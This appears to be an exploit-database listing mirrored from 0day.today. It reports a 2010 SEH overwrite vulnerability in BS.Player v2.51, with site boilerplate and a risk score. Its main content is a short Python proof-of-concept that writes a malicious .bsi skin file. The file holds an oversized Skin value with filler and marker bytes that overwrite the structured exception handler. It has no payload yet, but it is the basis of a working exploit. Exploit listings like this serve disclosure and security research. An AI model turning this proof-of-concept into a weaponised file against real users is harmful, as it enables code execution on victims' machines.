Lucene search
K

BS.Player v2.51 SEH Overwrite Vulnerability

🗓️ 15 Jan 2010 00:00:00Reported by Mert SARICAType 
zdt
 zdt
🔗 0day.today👁 48 Views

BS.Player v2.51 SEH Overwrite Vulnerability, Download Link: http://www.bsplayer.com/bsplayer-english/download-free.htm

Code
===========================================
BS.Player v2.51 SEH Overwrite Vulnerability
===========================================

# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com
 
junk = "[Options]\nSkin="
 
vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4
 
try:
   vulnerable = open("vulnerable.bsi",'w')
   vulnerable.write(vulnerability)
   vulnerable.close()
   print "Vulnerable file created!\n"
except:
   print "Error occured!"



#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jan 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
48